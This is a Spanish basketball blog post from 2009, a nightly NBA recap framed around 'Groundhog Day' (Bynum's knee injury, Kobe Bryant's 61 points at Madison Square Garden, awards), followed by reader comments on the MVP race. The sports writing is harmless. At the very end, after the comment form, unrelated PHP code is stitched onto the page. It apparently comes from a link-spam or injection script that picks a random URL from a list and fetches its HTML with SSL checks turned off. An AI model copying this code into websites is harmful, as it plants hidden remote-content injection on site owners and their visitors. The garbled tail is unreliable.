La crónica: El día de la marmota

03 de February de 2009 por MagicJohnson32

Por TheDeerHunter & MagicJohnson32

Atrapado en el tiempo”. Así se llama aquella desternillante comedia en la que Bill Murray quedaba condenado a revivir una y otra vez el mismo día en aquel maldito pueblo de Punxstawnwey. El día de la Marmota, precisamente… el 2 de febrero.

Coincidencia o no, así nos sentimos algunos ayer al conocer el alcance de la lesión de Andrew Bynum, que le tendrá apartado de las canchas entre 2 y 3 meses. Ante el mismo rival (los Grizzlies), en la misma zona (la rodilla) y en la misma época (un año y 15 días de diferencia entre una lesión y otra), la lesión de Bynum es un palo de los gordos para Lakers, que viven una y otra vez esta especie de maldición.

Pero hay otros detalles de la jornada de ayer que ya habíamos vivido anteriormente:

– 61 puntos del angelito Kobe, <Modo MVP Kobe: ON>, que pareció mandar un mensaje a la liga, a sus compañeros y a sí mismo. De paso, añadió otro récord a la colección. Kobe ensombreció una gran actuación de Pau Gasol en un partido “orgía” típico de equipos made by D’Antoni en el Madison.

– Derrotas fáciles de los equipos “manta” de la liga, Clippers, Kings y Wizards, contra los Heat, los Suns y los Grizzlies respectivamente (aunque ya no recordábamos la última victoria de Grizzlies). Los Bobcats también cayeron contra Utah, que jugaron sin Deron Williams (ni Kirilenko, ni Boozer) y que empiezan a parecerse a los Clippers, salvo por el detalle de que los Jazz ganan partidos.

– Tropezón de Hornets en su línea de una de cal y otra de arena. La lesión muscular de Chris Paul fue determinante en la remontada de los Blazers con un 38-15 en el último cuarto de la mano de Bayless y Outlaw. Rudy jugó bien y Sergio… como le pide McMillan. Los Blazers adelantaron anoche a Hornets, por cierto.

– Los Spurs ganaron con un poquito de coña (y polémica) un partido de esos de los que están a punto de perder pero siempre ganan, esta vez contra los Warriors. El hambre junto a las ganas de comer, vamos. Partidos de 32 puntos y 15 rebotes de Duncan también habíamos vivido algunos. Por si fuera poco para los Warriors, Monta Ellis se lesionó el tobillo.

Nowitzki se tiró el equipo a la espalda con otra de esas machadas en las que gana sí o sí, aunque sea contra pronóstico y pese a un nuevo partido mostrenco del más mostrenco Howard. Aquí también hubo lesión, y parece seria: Jameer Nelson se dislocó el hombro y puede perderse varias semanas de actividad.

¿Nos encontramos atrapados en el tiempo, reviviendo una y otra vez los mismos acontecimientos? ¿Estamos condenados o malditos?

Al final de la película, sin saber cómo, Bill Murray lograba de una tacada librarse de su maldición y llevarse a la chica. Pronto comprobaremos si ese es el final de temporada que nos espera o volveremos a despertarnos con el “I got you, babe” de Sony & Cher.

PREMIOS

MVP: Dwyane Wade, Pau Gasol, OJ Mayo, Tim Duncan y Manu Ginóbili habrían sido serios candidatos al premio cualquier otro día. Todos ellos anotaron más de 30 puntos y se apuntaron el triunfo. Pero mientras eso sucedía, Kobe Bryant hacía algo más: Historia. Ya avisábamos en la crónica de ayer que convenía seguir muy de cerca la actuación de Kobe en NY. Bryant superó los 60 puntos de Bernard King para lograr la mayor anotación individual en la historia del Madison Square Garden. Lo hizo con unas estadísticas de tiro de escándalo: 19 de 31 en tiros de campo y 20 de 20 en tiros libres para 61 puntos en 37 minutos de juego. El público neoyorquino le dedicó una gran ovación cuando Jackson lo sentó a poco menos de 2 minutos para el final.

El rookie: Hoy el premio para el mejor novato va ex aequo para dos compañeros de equipo. OJ Mayo, autor de 33 puntos con 12 de 22 en tiros de campo, además de 4 asistencias, y Marc Gasol, que hizo 22 puntos, 11 rebotes, 4 asistencias y 2 robos en la victoria de los Grizzlies en Washington D.C.

La sorpresa: Ya le iba tocando un buen partido, pero no esperábamos tanta efectividad por parte de Jason Richardson. 10 de 12 en tiros de campo para 24 puntos, 6 asistencias, 5 rebotes y 4 robos en sólo 25 minutos.

La decepción: Nos llevamos varias decepciones anoche. Destacamos a tres jugadores, estrellas en sus respectivos equipos, que parecieron ponerse de acuerdo para hacer un triste 2 de 10 en tiros de campo. Kevin Martin, Jamal Crawford y Brandon Roy. A diferencia de los dos primeros, el de los Blazers se llevó la victoria.

El mayor esfuerzo en vano: Los 33 puntos, 11 asistencias, 5 rebotes y 4 robos de Stephen Jackson no sirvieron para ganar a los Spurs (tal vez si hubiesen pitado la falta de Bowen en el intento sobre la bocina de Jackson para evitar la prórroga…). Al menos, se lleva nuestro galardón.

RAZONES PARA TRASNOCHAR

La madrugada del martes al miércoles nos ofrece seis partidos con diferentes focos de interés. Nos quedamos con éstos:

Spurs @ Nuggets. El duelo de líderes de división se presenta de lo más interesante con ambos equipos en una buena línea pero sin mucho margen de error ante la presión de los perseguidores. Billups, Melo y Nenê parecen en condiciones de plantar cara a Parker, Manu y Duncan, y más aún cuando éstos vienen de jugar una prórroga en Oackland la noche anterior. El rodeo trip de los Spurs se inició con triunfo; esta noche a partir de las 3:00 hora peninsular sabremos cómo continúa.

Paul Pierce. Los Celtics visitan esta noche (1:00 horas) a los Sixers con la más que probable ausencia, por segundo partido consecutivo, de Kevin Garnett. Mientras la gripe mantiene a KG fuera de las canchas, la jerarquía en los Celtics no admite discusión, como el propio Paul Pierce se encargó de demostrar ante los Wolves. Sin embargo, la visita a Philly y el cara a cara ante Andre Iguodala suponen un reto mayor para Pierce.

Y la pregunta del día: A día de hoy ¿qué jugador creéis que va por delante en la carrera por el MVP?

Comenta

15 comentarios a esta entrada

  1. Minikisto dice:
    #1

    Los Suns tienen el ticket de compra de J-Rich? Que me devuelvan a Raja Bell por dios (anoche discretito), a ver si es verdad que Mr. J-Rich se abona otra vez al +20ppg sino PHX acabará fuera de puestos playoff… Raro para Big Cactus que no haya metido mas de 20, con los ultimos partidazos que está haciendo Oh My SHAQ! STAT como siempre, +20, que clase, que grande.. como me gusta :D. Duncan magnifico (quien le enseño a jugar a este tio?) con un bestial Ginobili metiendo 32.. y van dos veces en poco tiempo (pobres Suns). Por delante para el MVP King James acabará ganandolo esta temporada Sí o Sí, aunque Flash parece empeñado en robarle protagonismo. De Kobe no hablamos, 61 puntos lo dicen todo,,, Y si ganan otra vez el anillo los C’s y se lo lleva Pierce? No me disgustaría para nada.

      Citar

  2. kantonyo dice:
    #2

    Q grandes Magic&Deer relacionando la lesión de Bynum con el dia de la marmota y la pelicula de Bill Murray. Todo un acierto!!!

    Por cierto posiblemente una de las peliculas más infravaloradas.

      Citar

  3. MagicJohnson32 dice:
    #3

    Gracias Kantonyo. Felicita a Deer que la idea ha sido suya. ¿Crees que la peli está infravalorada? ¡Es que no conozco a nadie que no le guste!

    Ah, qué partidazo el del Madison. Me gusta ver que los Knicks han superado con D’Antoni y Walsh el estado depresivo en el que se hallaban. Y lo de Kobe… es fascinante. Mete 4 ó 5 canastas de verdadero escándalo. La suspensión a tabla tras rectificado ante David Lee y la que mete tras pivotar de espaldas son dos auténticas joyas.

      Citar

  4. Llukas 70 dice:
    #4

    Si, si lo de Kobe es impresionante… y es verdad. Pero a dia de hoy el hombre que mas se merece el mvp es ni mas ni menos que Lebron James, sin duda el mejor jugador de esta liga, el mas regular, el mas impresionante…
    Bryant jugo muy bien en el Madison y en muchos otros partidos, pero este año el mvp es para Leborn.

      Citar

  5. MagicJohnson32 dice:
    #5

    Ah sí, que no he respondido a la pregunta… Ahora mismo el MVP es LeBron, está claro. Los otros candidatos son Dwight, Kobe y Wade. Los Heat andan demasiado lejos de la cabeza como para que DW tenga opciones. Pero si Orlando o Lakers hacen un buen tramo final y acaban primeros, ya veremos a quién va el premio.

      Citar

  6. Noelinho dice:
    #6

    A mi Atrapado en el tiempo me parece soporiferamente aburrida… lo siento 😛

      Citar

  7. TheDeerHunter dice:
    #7

    Calco la respuesta de Magic…
    El caso es que ayer, a colación de la impresionante marca de su equipo, nombrábamos a Dwight Howard como MVP de enero sin haber reparado en que Lebron ha hecho un mes de 27,5ppp 9,6reb 8,2asis 2,1rob y 1,5asis… algo que no había hecho NADIE desde cierto pajarraco en el 87 de cuyo nombre no quiero ni acordarme. Y el caso es que Lebron sólo lleva 4 años en la liga cuando Larry empezó a hacer ese tipo de números cuando llevaba 6.

    El problema de Lebron es que ahora mismo casi hemos interiorizado sus bestialidades… No tengo claro si lo elegiría como el mejor jugador que existe ahora mismo pero he visto pocas cosas superiores a él en mi vida.

      Citar

  8. Kantonyo dice:
    #8

    Yo no sé si será por cabezonaria o no… sigo pensando que los Cavs no tienen un gran plantilla. Por lo tanto no tengo dudas de que el gran MVP de la temporada es LeBron James.

    Me imagino a Orlando sin Howard, y apostaria por ellos como semifinalistas del este. Y me imagino a Lakers sin Kobe y tambien confiaría en ellos como mínimo semifinalistas en el oeste (con bynun claro). Pero me imagino a Cleveland o Miami sin James o Wade y cambia mucho la cosa…..

    Por lo tanto no tengo dudas…. No quiere decir que Kobe Bryant sea peor jugador que James, pero esta temporada el Jugador Mas Valioso sin duda es Lebron.

      Citar

  9. TheDeerHunter dice:
    #9

    Es cabezonería Kantonyo… aunque al menos has corregido tus predicciones iniciales en el blog ;D

    Fuera de coñas… Mo Williams, Ilgauskas y Delonte West son jugadores válidos. Sus estadísticas respaldan ese argumento y podrían entrar en la rotación de los (digamos) otros 5 favoritos al título (hablo de Boston, Orlando, Lakers, Spurs y NO) en algún caso incluso como titulares. Pero además, lo son más por el rol específico que se les pide en el equipo diseñado por y para Lebrón.

    A partir de ahí tienes a 4-5 jugadores válidos y con cierta experiencia. Gibson fue clave para llegar a la primera final y podría volverlo a ser. Varejao curra como el que más y es un jugador que aporta siempre. Szerbiak como mínimo es un expiring cojonudo pero además es efectivo para el tiempo y las jugadas que le dejan y Ben Wallace, sin ser el de los Pistons, sigue siendo un aceptable defensor y un buen reboteador… podríamos hablar de Hikson o de Pavlovic…
    Juer, es que tienen de todo… aunque obviamente nada sobresaliente tras Lebron.

    Ahora bien si esos expirings de los que tanto se habla se juegan bien yo creo que nadie va a estar en condiciones de pararlos.

      Citar

  10. Jabho dice:
    #10

    Por ahora el MVP es para LeBron. Si Kobe sube un poco el nivel se verá, pero lo dudo porque los Lakers con o sin lesión de Bynum no lo necesitan tanto…

    Nos hemos acostumbredo a ver ciertas cosas que pa que. Los 61 de Kobe son la pera. Las medias continuas de LeBron un escándalo.

      Citar

  11. couxe dice:
    #11

    Hay un jugador del que apenas se está hablando de cara al MVP… El señor Chris Paul, el único capaz de seguir de cerca a LeBron en la estadística que para mí más dice de un jugador, la eficiencia…
    Los números que está haciendo son de escándalo, y mucho más si tenemos en cuenta que es un jugador de poco más de 1,80. A poco que su equipo mejore su balance de aquí a final de temporada, creo que debería ser el único en condiciones de pelear el MVP a LeBron…

      Citar

  12. Viva_Dirk dice:
    #12

    Los Hornets tienen que mejorar mucho su balance para que Paul entre en las quinielas. En la eficiencia tanto Howard como Wade estan cerca de ellos, y si Orlando acaba por encima de Boston o Cleveland creo que Dwight tiene muchas posibilidades.

      Citar

  13. MagicJohnson32 dice:
    #13

    Dejaos de eficiencia, jeje.

    Dwight tiene muchas posibilidades porque está haciendo un temporadón, su equipo está muy por encima de lo previsto y encima él es una bestia en defensa. La lesión de Nelson les pasará factura. Veremos si el turco vuelve a su papel de point-forward o qué, pero imagino que los Magic bajarán y Dwight se caerá de la lucha por el MVP.

      Citar

  14. Kantonyo dice:
    #14

    No entiendo Magic, dices que Dwight es favorito para MVP pero luego dices que con la lesión de Nelson peligra….

    En cambio sigo pensando que aunque se lesione Mo Williams (que lo está haciendo muy bien), no peligraría para nada el MVP de Lebron.

    De eso se trata el MVP, de ser el más valioso.

      Citar

  15. MagicJohnson32 dice:
    #15

    No he dicho que Dwight sea favorito. Digo que ahora mismo es uno de los principales candidatos porque está haciendo una gran temporada y además es, posiblemente, el mejor defensor del año.

    Creo que con Nelson los Magic no serán tan competitivos, de manera que con el balance que parece que harán los de arriba, Dwight perdería sus opciones (de la misma manera que ahora creo que no tienen opciones ni Paul ni Wade).

    Y vaya, si se lesiona Mo Williams creo que los Cavs lo pagarían, porque es una de las claves de la temporada. Ey, que si queremos seguir pensando que LeBron juega solo, pues vale. Pero los Cavs tienen la mejor defensa de la liga, por delante de los Celtics, bastante por delante de los Pistons, e infinitamente por delante del resto de equipos.

    Pero sí, ya he dicho que el MVP hasta ahora es claramente LeBron.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>